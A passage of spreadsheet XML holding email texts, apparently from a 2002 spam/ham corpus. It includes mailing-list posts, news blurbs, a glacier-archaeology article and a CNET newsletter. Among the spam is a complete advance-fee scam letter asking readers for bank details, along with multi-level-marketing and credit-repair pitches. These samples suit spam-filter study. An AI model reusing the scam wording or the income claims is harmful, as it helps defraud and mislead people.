 that I have open GL). I guess I'll have to try and do that from source, 
 unless anyone has any ideas?
 Cheers
 John
 John
 But I can't seem to find a version 
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: OSXCon Wed. -- James Gosling
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000214.html
 Date: 2002-10-02T16:04:06-08:00
 Java has been successful everywhere but the desktop. Or at least that's what 
 people here. It's big on the server and that downs out the desktop news. What 
 else went wrong? Applets. Microsoft's battle with Java. For the longest 
 time,...
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Ehiogu fills the Ferdinand gap
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8622125,215/
 Date: 2002-10-07T03:52:51+01:00
 *Football:* Ugo Ehiogu will stand in for Rio Ferdinand following his sudden and 
 unexpected withdrawal from the England squad.
</t>
  </si>
  <si>
    <t xml:space="preserve">I've seen articles on this type of stuff passing through various forums
 for several years.  I've always found archaeology interesting for no
 particular reason.  Here is a recent article from U.S. News that I
 actually still have in the dank recesses of my virtual repository.
 -James Rogers
  jamesr@best.com
 --------------------------------------------
 http://www.usnews.com/usnews/issue/020916/misc/16meltdown.htm
 Defrosting the past
 Ancient human and animal remains are melting out of glaciers, a bounty
 of a warming world
 BY ALEX MARKELS
 As he hiked near Colorado's Continental Divide in the summer of 2001, Ed
 Knapp noticed a strange shape jutting from a melting ice field at 13,000
 feet. "It looked like a bison skull," the building contractor and
 amateur archaeologist recalls. "I thought, 'That's strange. Bison don't
 live this high up.' "
 Knapp brought the skull to the Denver Museum of Nature and Science,
 where scientists last month announced that it was indeed from a
 bisonone that died about 340 years ago. "This was an extraordinary
 discovery," says Russ Graham, the museum's chief curator, adding that it
 could alter notions of the mountain environment centuries ago. "There's
 probably a lot more like it yet to be found."
 And not just bison. Colorado isn't the only place where glaciers and
 snowfields are melting. Decades of unusual warmth in regions from Peru
 to Alaskaa trend some think is linked to emissions from cars and
 industryhave shrunk or thawed many of the world's 70,000 glaciers. As
 the ice recedes, a treasure-trove of human and animal artifacts is
 emerging, extraordinarily well preserved after centuries in the deep
 freeze. The fabrics, wood, bone, and DNA-rich tissue found on the mucky
 fringes of the ice are revising scientists' understanding of our
 predecessors' health, habits, and technology, and the prey they pursued.
 "It's mind-boggling how many different fields are being advanced through
 studying these remains," says Johan Reinhard, a high-altitude
 archaeologist and explorer-in-residence at the National Geographic
 Society. Rare, spectacular finds like the frozen mummies he discovered
 in the Andes of Peru in the 1990s and the legendary 5,300-year-old "Ice
 Man," found at the edge of a receding glacier in the Alps in 1991, have
 offered time capsules of cultural and biological information. Now, as
 the ice continues to retreat, it is yielding not just occasional
 treasures but long records of humans and animals in the high mountains.
 Vanishing act. The trick is finding such specimens before Mother
 Natureand looterstake them first. Once uncovered, frozen remains can
 deteriorate within hours or be gnawed by animals. Moreover, they're
 often so well preserved when they emerge that people who come upon them
 don't even realize they're ancient.
 That was the case when three men hunting sheep near a high glacier in
 British Columbia, Canada, three years ago saw what they thought was a
 dead animal. "It looked a little like sealskin buried in the ice,"
 recalls Warren Ward, a teacher from nearby Nelson. "But when I looked
 closer I could see leather fringe from a coat and finger bones."
 Figuring they had found the remains of another hunter, or perhaps a fur
 trapper, the men stowed a flint knife and other artifacts in a Zip-Loc
 bag and delivered them to local officials. Archaeologists later exhumed
 the fallen hunter's body, along with a woven hat, fur clothing, and what
 seemed to be a medicine bag. Carbon dating revealed that the hunter
 lived about 550 years ago. Dubbed Kwaday Dan Ts'inchi, or Long Ago
 Person Found, by people of the Champagne and Aishihik First Nations (who
 may be his direct descendants), he is perhaps the best-preserved human
 from the period ever found in North America.
 Other findings from melting ice in the neighboring Yukon region could
 explain what that long-ago person was doing in the mountains in the
 first place. "Before this there was no archaeological record of people
 living here," says Greg Hare, a Yukon government archaeologist. "Now we
 see that this area was very much part of people's seasonal activities."
 Like Ward's discovery, the search began by chance, when Kristin Benedek
 caught a whiff of what smelled like a barnyard as she and her husband,
 Gerry Kuzyk, hunted sheep at 6,000 feet in the mountains of the south
 Yukon. They followed the scent to a melting patch of ice covered in
 caribou dung. "It was really odd, because I knew there hadn't been
 caribou in the area for at least 100 years," recalls Kuzyk, then a
 wildlife biologist with the Yukon government.
 Caribou cake. Returning a week later, he found "what looked like a
 pencil with string wrapped around it." It turned out to be a
 4,300-year-old atlatl, or spear thrower. Further investigation of the
 ice patchand scores of others around the regionrevealed icy layer
 cakes filled with caribou remains and human detritus chronicling 7,800
 years of changing hunting practices.
 Scientists now believe ancient caribou and other animals flocked to the
 ice each summer to cool down and escape swarming mosquitoes and flies.
 Hunters followed the game. They returned for centuries and discarded
 some equipment in the ice. "We've got people hunting with throwing darts
 up until 1,200 years ago," says Hare, who now oversees the research
 project. "Then we see the first appearance of the bow and arrow about
 1,300 years ago. And by 1,200 years ago, there's no more throwing
 darts."
 Now scientists are trying to make the search less a matter of luck. They
 are developing sophisticated computer models that combine data on where
 glaciers are melting fastest and where humans and animals are known to
 have migrated to pinpoint the best places to search in Alaska's Wrangell
 and St. Elias mountain rangesthe United States' most glaciated
 terrainand in the Andes. Johan Reinhard thinks the fast- thawing
 European Alps could also deliver more findings, perhaps as exquisite as
 the Ice Man. "Global warming is providing us high-altitude
 archaeologists with some fantastic opportunities right now. We're
 probably about the only ones happy about it."
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: So I missed this one...
</t>
  </si>
  <si>
    <t xml:space="preserve">bitbitch@magnesium.net wrote:
 &gt; Turns out the music industry settled ... quite a hefty
 &gt; settlement.
 Funnky, I thought that it was minor in comparison the the gouging that 
 occurs on a standard CD.
 &gt; The Wall Street Journal
 &gt; Copyright (c) 2002, Dow Jones &amp; Company, Inc.
 &gt; Tuesday, October 1, 2002
 &gt; 
 &gt; Five Music Concerns To Pay $143.1 Million In Price-Fixing Case
 &gt; Reuters News Service ...
 &gt; The companies, which didn't admit any wrongdoing, will pay $67.4
 &gt; million in cash to compensate consumers who overpaid for CDs between
 &gt; 1995 and 2000. The companies also agreed to distribute $75.7 million
 &gt; worth of CDs to public entities and nonprofit organizations throughout
 &gt; the country.
 The CDs will probably cost less than 7.5 million to produce and 
 distribute... "didn't admit any wrongdoing"?!? Give me a break.
 Elias
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: URGENT REPLY.
</t>
  </si>
  <si>
    <t xml:space="preserve">MR.RONARD TONY
 WEMA BANK PLC. 
 LAGOS/NIGERIA 
 Email: ronardtony@mail.com
 Dear Sir, 
 REQUEST FOR CO-OPERATION ON A PRIVATE BUSINESS
 RELATIONSHIP 
 Every four years, Nigeria Banks transfer to it s
 treasury Millions of Dollars of unclaimed Deceased
 Depositors Funds, in compliance with the Banking Laws
 and Guidelines. In the majority of cases, with
 reference to my Bank   WEMA BANK PLC. The money
 normally runs into several millions of dollars. Until
 Dr.David Fang  death along with his wife, Doris, their
 two children, Micheal and Ann in a private jet plane
 crash. I was his foreign currency denoted Bank Account
 Manager with constant balance in excess of eight
 digits. Ever since his death and up till this time of
 writing, no next of kin or relation of his has come
 forward to claim his money with us. 
 Naturally, as long as late Dr.David Fang money remains
 unclaimed, the bank remains richer in free funds with
 his money. However, with my being in direct charge of
 Bills and Exchange in the foreign Remittance
 Department of my bank, I am in position to cause the
 payment of this money to whosoever that present
 himself as the next of kin or relation of the late
 Dr.David Fang' on private business deal basis. 
 Now the game plan and the purpose of writing to you
 exclusively having been highly recommended as the
 right and proper person to handle this deal by a
 Management Consultant friend of mine, who has traveled
 widely, including your country is that I want to pull
 out this unclaimed money amounting to $14,900,000:00
 (Fourteen Million, Nine Hundred United States Dollars)
 with your co-operation and assistance by just doing
 the following: 
 - 
 (a) Act as next of kin or relation of late Dr.David
 Fang 
 (b) Provide your bank account and location where you
 want the money remitted .
 (c) Provide your direct and private Telephone/Fax
 numbers for effective communication 
 (d) Give immediate reply to this proposal using the
 above Tel/Fax 
 number for details on how to proceed. 
 For your co-operation and efforts, 40% of the money
 will be for you as my foreign partner,10% for
 settlement of all expenses that might be incurred on
 the course of this transaction, while 50% will be for
 myself that will eventually visit your country for
 disbursement of the fund. 
 Looking forward to a mutual and beneficial business
 relationship. 
 Regards,
 RONARD TONY.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Stop creditors in their tracks           10891
</t>
  </si>
  <si>
    <t xml:space="preserve">** 5 FREE eBooks JUST FOR SIGNING UP. Sent via email within
    48 hours of entering your name and email address.
 ** NO PRESSURE TO BUY!
 ** TEST DRIVE IT FOR AS LONG AS YOU WISH FOR FREE!
 ** ONLY GET INVOLVED IF YOU LIKE WHAT YOU SEE.
 We will put 800 in your Downline in 30 days!!
 Visit http://www.fastbizonline.com/bizopp/
          TRY IT FOR FEEE!
 It's working for me!!  I'm earning a guaranteed minimum
 monthly income of $3,000.00!! and you can too!
 Accept our no cost, no obligation opportunity to
 watch your business grow before you spend a dime.
 Visit http://www.fastbizonline.com/bizopp/
 Why are we doing this? Because when you see the
 explosive growth and momentum, and how this
 program was designed to help any sincere marketer
 succeed, you'll accept the downline we've built under
 you and harvest your piece of this incredible event.
 Join the team of Internet Marketing Professionals that
 are presenting this opportunity to hundreds of people
 every day!
 Theres absolutely NO risk in joining
 You owe it to yourself to
 See it work today!!
 Visit http://www.fastbizonline.com/bizopp/
 FIRE YOUR BOSS!
 PAY OFF YOUR BILLS!
 SPEND MORE TIME WITH YOUR FAMILY!
 BUY A NEW CAR!
 PAY OFF YOUR MORTGAGE!
 Are all of these things are possible?
 YOU BET THEY ARE!
 Visit http://www.fastbizonline.com/bizopp/
 Visit http://www.fastbizonline.com/bizopp/
 Visit http://www.fastbizonline.com/bizopp/
 *************************************************************
 If you do not wish to receive any more emails from me, please 
 send an email to "affiliate1@btamail.net.cn" requesting to be 
 removed.
 *************************************************************
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Clean your credit right from your computer!        6486
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;HEAD&gt; 
 &lt;TITLE&gt;creditfix&lt;/TITLE&gt;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OUND=3Dhttp://365.pakoa.com/creditfix/email/background_arrow.gif WIDTH=3D4=
 00&gt; 
 &lt;TR&gt; 
 &lt;TD&gt;&lt;A HREF=3Dhttp://365.pakoa.com/creditfix/?cid=3D1320&amp;mid=3D15000&gt;&lt;IMG =
 SRC=3Dhttp://365.pakoa.com/creditfix/email/banner_email.gif BORDER=3D0&gt;&lt;/A=
 &gt;&lt;BR&gt; 
 &lt;IMG SRC=3Dhttp://365.pakoa.com/creditfix/email/line.gif&gt;&lt;BR&gt;&lt;BR&gt; 
 &lt;A HREF=3Dhttp://365.pakoa.com/creditfix/?cid=3D1320&amp;mid=3D15000&gt;&lt;img src=3D=
 http://365.pakoa.com/creditfix/email/body_email.gif alt=3D"" border=3D"0"&gt;=
 &lt;/A&gt; 
 &lt;BR&gt; 
 &lt;FONT FACE=3DVerdana SIZE=3D2&gt;Thank You,&lt;/FONT&gt;&lt;BR&gt; 
 &lt;IMG SRC=3Dhttp://365.pakoa.com/creditfix/email/thankyou.gif&gt; 
 &lt;BR&gt; 
 &lt;/TD&gt; 
 &lt;/TR&gt; 
 &lt;TR&gt; 
 &lt;TD&gt; 
 &lt;IMG SRC=3Dhttp://365.pakoa.com/creditfix/email/line.gif&gt;&lt;BR&gt;&lt;br&gt; 
 &lt;FONT FACE=3DVerdana SIZE=3D1&gt;Your email address was obtained from a purch=
 ased 
 list, Reference # 1320-15000.&amp;nbsp;&amp;nbsp;If you wish to unsubscribe from t=
 his list, please 
 &lt;a href=3D"http://213.139.76.162/PHP/remove.php"&gt;Click here&lt;/a&gt; and enter =
 your 
 name into the remove box. If you have previously 
 unsubscribed and are still receiving this message, you may email our 
 &lt;a href=3D"mailto:nospamws@yahoo.com?Subject=3DAbuse Report"&gt;Abuse Control=
  Center&lt;/a&gt;, 
 or call 1-888-763-2497, or write us at: NoSpam, 6484 Coral Way, 
 Miami, FL, 33155".&lt;/FONT&gt;&lt;br&gt; 
 &lt;BR&gt; 
 &lt;IMG SRC=3Dhttp://365.pakoa.com/creditfix/email/line.gif&gt;&lt;BR&gt; 
 &lt;FONT FACE=3DVerdana SIZE=3D1&gt;&amp;copy; 2002 Web Credit Inc. All Rights Reser=
 ved&lt;/FONT&gt;&lt;FONT FACE=3D"Verdana" SIZE=3D"1"&gt;.&lt;/FONT&gt;&lt;/TD&gt; 
 &lt;/TR&gt; 
 &lt;/TABLE&gt; 
 &lt;/TD&gt; 
 &lt;/TR&gt; 
 &lt;/TABLE&gt; 
 &lt;/CENTER&gt; 
 &lt;BR&gt; 
 &lt;/BODY&gt; 
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: This week: Browse or bust
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Download Dispatch - PC Edition&lt;/TITLE&gt;
 &lt;META http-equiv=Content-Type content="text/html; charset=windows-1252"&gt;
 &lt;META content="MSHTML 5.50.4522.1800" name=GENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY bgColor=#eeeeee&gt;
 &lt;CENTER&gt;
 &lt;!-- header --&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=612 bgColor=#ffffff border=0&gt;
    &lt;TBODY&gt;
    &lt;TR vAlign=top&gt;
      &lt;TD width=442 colSpan=4&gt;&lt;IMG height=60
        alt="Download Dispatch - PC Edition"
        src="http://www.cnet.com/i/nl/dl/hd_pc.gif" width=442&gt;&lt;BR&gt;
        &lt;TABLE cellSpacing=0 cellPadding=0 width=442 bgColor=#ffcc00 border=0&gt;
          &lt;TBODY&gt;
          &lt;TR&gt;
            &lt;TD bgColor=#000000 colSpan=3&gt;&lt;IMG height=1
              src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
          &lt;TR&gt;
            &lt;TD width=1 bgColor=#000000 rowSpan=2&gt;&lt;IMG height=10
              src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;
            &lt;TD width=10 rowSpan=2&gt;&lt;IMG height=10
              src="http://www.cnet.com/b.gif" width=1&gt;&lt;/TD&gt;
            &lt;TD width=430&gt;&lt;IMG height=10 src="http://www.cnet.com/b.gif"
            width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
          &lt;TR&gt;
            &lt;TD bgColor=#000000&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif"
              width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;
        &lt;/TABLE&gt;
       &lt;/TD&gt;
 &lt;!-- Accucast ad --&gt;
 &lt;td width=160 rowspan=2&gt;
 &lt;iframe src="http://www.zdnet.com/include/ads/ifc/RGROUP=2560" scrolling="no" frameborder="0" hspace="0" vspace="0" height="600" width="160" marginheight="0" marginwidth="0"&gt;
 &lt;script language="JavaScript" src="http://www.zdnet.com/include/ads/js/RGROUP=2560"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;
 &lt;!-- /Accucast ad --&gt;
 &lt;!-- search form --&gt;
 &lt;br&gt;&lt;table cellspacing=0 cellpadding=0 width=160 border=0&gt;&lt;form
 method=get action="http://www.search.com/redirect"&gt;
 &lt;tr valign=top&gt;&lt;td&gt;&lt;font size="-1" face="arial,helvetica,sans-serif"&gt;
 &lt;img src="http://www.cnet.com/i/nl/dl/dispatch_hd.gif" height=20
 width=150 alt="Search Download.com" border=0&gt;&lt;br&gt;
 &lt;img src="http://cnet.com/b.gif" width=1 height=1&gt;&lt;br&gt;&lt;input
 type=text name=q size=17 value=""&gt;&lt;br&gt;
 &lt;select name=target class=frmel&gt;
   &lt;option
 value="http://download.cnet.com/downloads/0,10150,0-10000-103-0-1-7,00.html?tag=srch&amp;qt=%%q%%&amp;cn=&amp;ca=10000"&gt;Downloads
   &lt;option
 value="http://cnet.search.com/search?tag=ex.downloadpc.dispatch.srch.cnet"&gt;All
 CNET
   &lt;option
 value="http://www.search.com/search?tag=ex.downloadpc.dispatch.srch.web"&gt;The
 Web
 &lt;/select&gt; &lt;input type=submit value="Go!"&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/form&gt;&lt;/table&gt;&lt;p&gt;
 &lt;!-- /search form --&gt;
 &lt;!-- right column content --&gt;
 &lt;!-- updates &amp; drivers --&gt;
 &lt;IMG height=20 alt="Updates &amp; Drivers"
        src="http://www.cnet.com/i/nl/dl/rhc_up.gif" width=150&gt;&lt;BR&gt;
        &lt;TABLE cellSpacing=0 cellPadding=2 width=160 border=0&gt;
          &lt;TBODY&gt;
 &lt;TR&gt;&lt;TD&gt;
 &lt;FONT face="arial, helvetica" size=-1&gt;
 &lt;FONT size=-2&gt;In Utilities:&lt;/FONT&gt;&lt;BR&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=08-IFoQIRjFUlP_0m5g3F-erCpGY99R" &gt;ESftp 4.1&lt;/A&gt;&lt;/B&gt;&lt;P&gt;
 &lt;FONT size=-2&gt;In Home &amp; Desktop:&lt;/FONT&gt;&lt;BR&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=1d-6KTjIGQF7vNOQbBRl28NRQSnqQuR" &gt;CursorXP 1.2&lt;/A&gt;&lt;/B&gt;&lt;P&gt;
 &lt;FONT size=-2&gt;In Audio:&lt;/FONT&gt;&lt;BR&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=32-Gx5IIrQ6j3J39sODFWVhZSgRXBsR" &gt;Acoustica CD Label Maker 1.13&lt;/A&gt;&lt;/B&gt;&lt;p&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=47-ADmxIIZH1jE9TBOOiJGu_NEsnEPR" &gt;DJ 2000 1.6&lt;/A&gt;&lt;/B&gt;&lt;p&gt;
 &lt;FONT size=-2&gt;In Internet:&lt;/FONT&gt;&lt;BR&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=5c-BnjPIZnPblJQ5mt53xlZk0f-IonR" &gt;ICQ 2002a Build #3728&lt;/A&gt;&lt;/B&gt;&lt;P&gt;
 &lt;FONT size=-2&gt;In Multimedia:&lt;/FONT&gt;&lt;BR&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=72-R8PHIPUf0j9-C7UrqMtNXjoCKqyR" &gt;AI Picture Utility 6.2.1&lt;/A&gt;&lt;/B&gt;&lt;P&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=87-izDOQ8naPL1z-TReplrQ8kasp4ZR" &gt;PhotoJam 3.0&lt;/A&gt;&lt;/B&gt;&lt;P&gt;
 &lt;FONT size=-2&gt;In Web Authoring:&lt;/FONT&gt;&lt;BR&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=9c-xt6pQanykQ4ml2vlXdIl9Oi-UidR" &gt;Webserver Stress Tool 5.32&lt;/A&gt;&lt;/B&gt;&lt;P&gt;
 &lt;FONT size=-2&gt;In Games:&lt;/FONT&gt;&lt;BR&gt;
 &lt;B&gt;&lt;a href="http://clickthru.online.com/Click?q=b1-YjxJQ-0dzArQPJ0r9i_f_B0NLncR" &gt;David's Backgammon 4.6.1&lt;/A&gt;&lt;/B&gt;&lt;P&gt;
 &lt;FONT size=-2&gt;Want to search for updates automatically? Click &lt;a href="http://clickthru.online.com/Click?q=c6-URF9QMLKguc_u7AWdT_pfmeDx0RR" &gt;here&lt;/A&gt; to try out CNET CatchUp,
 a free service that scans your system and points you to the latest software updates.&lt;P&gt;
 &lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;!-- /updates &amp; drivers --&gt;
 &lt;!-- catchup --&gt;
 &lt;!-- /catchup --&gt;
 &lt;!-- shopper upgrades --&gt;&lt;IMG height=20
        alt="Software &amp;#13;&amp;#10;Upgrades"
        src="http://a.r.tv.com/cnet.1d/i/nl/cu/rhc_shopper.gif" width=160
        NOSEND="1"&gt;&lt;BR&gt;
        &lt;TABLE cellSpacing=0 cellPadding=2 width=150 border=0&gt;
          &lt;TBODY&gt;
          &lt;TR&gt;
            &lt;TD&gt;
              &lt;P&gt;
              &lt;TABLE cellSpacing=0 cellPadding=2 width=150 border=0&gt;
                &lt;TBODY&gt;
                &lt;TR&gt;
                  &lt;TD colSpan=2&gt;&lt;FONT
                    face="Arial, Helvetica, &amp;#13;&amp;#10;sans-serif"
                    size=2&gt;&lt;B&gt;Most Popular Upgrades:&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;/TD&gt;&lt;/TR&gt;
                &lt;TR vAlign=top&gt;
                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
                    size=-1&gt;&lt;B&gt;&amp;nbsp;1.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 &lt;a href="http://clickthru.online.com/Click?q=db-rmY9QJEK6mGgsB1vpmtTwxp6DtFR" &gt;
 ZoneAlarm Pro 3.0&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
                &lt;TR vAlign=top&gt;
                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
                    size=-1&gt;&lt;B&gt;&amp;nbsp;2.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 &lt;a href="http://clickthru.online.com/Click?q=f0-nv_DQWg4KiBnqc92fqfAgMcXea9R" &gt;
 Norton AntiVirus 2002&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
                &lt;TR vAlign=top&gt;
                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
                    size=-1&gt;&lt;B&gt;&amp;nbsp;3.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 &lt;a href="http://clickthru.online.com/Click?q=05-gDULIG8WRMVW-3yfnODtxI8fiiuR" &gt;
 AdSubtract Pro 2.5&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
                &lt;TR vAlign=top&gt;
                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
                    size=-1&gt;&lt;B&gt;&amp;nbsp;4.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 &lt;a href="http://clickthru.online.com/Click?q=1a-y6ZkIlXH6w71bxDd5q0_HZB17WsR" &gt;
 Microsoft Windows XP - Professional&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
               &lt;TR vAlign=top&gt;
 		                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
                    size=-1&gt;&lt;B&gt;&amp;nbsp;5.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 &lt;a href="http://clickthru.online.com/Click?q=30-u8NEIRrWECAJzvv8IeOdSKzjX19R" &gt;
 Nero Burning ROM 5.5&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
                &lt;TR vAlign=top&gt;
                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
                    size=-1&gt;&lt;B&gt;&amp;nbsp;6.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
                  &lt;a href="http://clickthru.online.com/Click?q=45-fNkJIKB68VbHZ6z-EDvznhjonleR" &gt;
 Reason 2.0&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
                    &lt;TR vAlign=top&gt;
                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 	                       size=-1&gt;&lt;B&gt;&amp;nbsp;7.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 	                     &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 	                     &lt;a href="http://clickthru.online.com/Click?q=5a-ahD1IP0IMGPrJbU24YOLpk6Td6yR" &gt;
 Microsoft Windows XP - Home Edition&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
               &lt;TR vAlign=top&gt;
 		                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 		                    size=-1&gt;&lt;B&gt;&amp;nbsp;8.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 		                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 		                  &lt;a href="http://clickthru.online.com/Click?q=6f-3x79IOLAbBx7Pch3RXvLF34ULXPR" &gt;
 QuickBooks Pro 2002&lt;/A&gt; &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
                &lt;TR vAlign=top&gt;
                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
                    size=-1&gt;&lt;B&gt;&amp;nbsp;9.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
                  &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 &lt;a href="http://clickthru.online.com/Click?q=84-CCOyQ60TygzU3vfZsihsBSWgp7dR" &gt;
 Adobe Photoshop 7.0&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
                &lt;TR vAlign=top&gt;
                  &lt;TD&gt;&lt;FONT face="arial, helvetica"
 size=-1&gt;&lt;B&gt;10.&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
                 &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;
 &lt;a href="http://clickthru.online.com/Click?q=99-4mtyQAdTjOl853t2H3f2jvrqULcR" &gt;
 WinZip 8.1&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
                &lt;TR&gt;
                  &lt;TD colSpan=2&gt;
                    &lt;FONT face="Arial, Helvetica, sans-serif" size=-2&gt;&lt;BR&gt;Find a
                    complete list of the 50 most popular software products at
                    &lt;a href="http://clickthru.online.com/Click?q=ae-jOE6QMB1LJ4126D8-mhe2RYEVuRR" &gt;&lt;B&gt;CNET
 Shopper.com&lt;/B&gt;&lt;/A&gt;.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
              &lt;P&gt;&lt;!-- /shopper upgrades --&gt;
 &lt;!-- Vertical Brick: July 1 2002--&gt;
  &lt;IMG alt="Also from CNET" height=20 src="http://home.cnet.com/Ads/Media/Images/RHC_ALSOfromCNETnet.gif" width=150 NOSEND="1"&gt;&lt;BR&gt; &lt;TABLE border=0 cellPadding=2 cellSpacing=0 width=150&gt;&lt;TBODY&gt;&lt;TR vAlign=top&gt; &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c3-x1yCQJLx-QMWW2wZ5znP-FdWuuFR" &gt;Summer 2002 software&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=d8-XW73QWLWIvbhd79mkSWreAgRDc9R" &gt;Test your bandwidth&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ed-jLlvQgVq7YMepa9xv3orMjEsaQuR" &gt;New jobs, click here!&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=03-13t3I3rzz-oPeCPhKQcaLlAI6OFR" &gt;Inside HP&lt;/a&gt; &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=18-WhdzI98qBXkhOKJTiMEyR1N6759R" &gt;Bluetooth: speeds up&lt;/a&gt;
 &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/P&gt;
 &lt;!-- End Vertical Brick--&gt;
 &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/P&gt;&lt;/TD&gt;
 &lt;!-- /right column content --&gt;
 &lt;!-- Main body content --&gt;
      &lt;TD width=9 rowSpan=2&gt;&lt;IMG height=60
        src="http://www.cnet.com/i/nl/dd_c.gif" width=9&gt;&lt;BR&gt;
        &lt;TABLE cellSpacing=0 cellPadding=0 width=9 border=0&gt;
          &lt;TBODY&gt;
          &lt;TR&gt;
            &lt;TD bgColor=#000000&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif"
              width=9&gt;&lt;/TD&gt;&lt;/TR&gt;
          &lt;TR&gt;
            &lt;TD bgColor=#ffcc00&gt;&lt;IMG height=10 src="http://www.cnet.com/b.gif"
              width=1&gt;&lt;/TD&gt;&lt;/TR&gt;
          &lt;TR&gt;
            &lt;TD bgColor=#000000&gt;&lt;IMG height=1 src="http://www.cnet.com/b.gif"
              width=1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;
      &lt;TD width=1 bgColor=#000000 rowSpan=2&gt;
        &lt;TABLE cellSpacing=0 cellPadding=0 width=1 border=0&gt;
          &lt;TBODY&gt;
          &lt;TR&gt;
            &lt;TD bgColor=#eeeeee&gt;&lt;IMG height=60 src="http://www.cnet.com/b.gif"
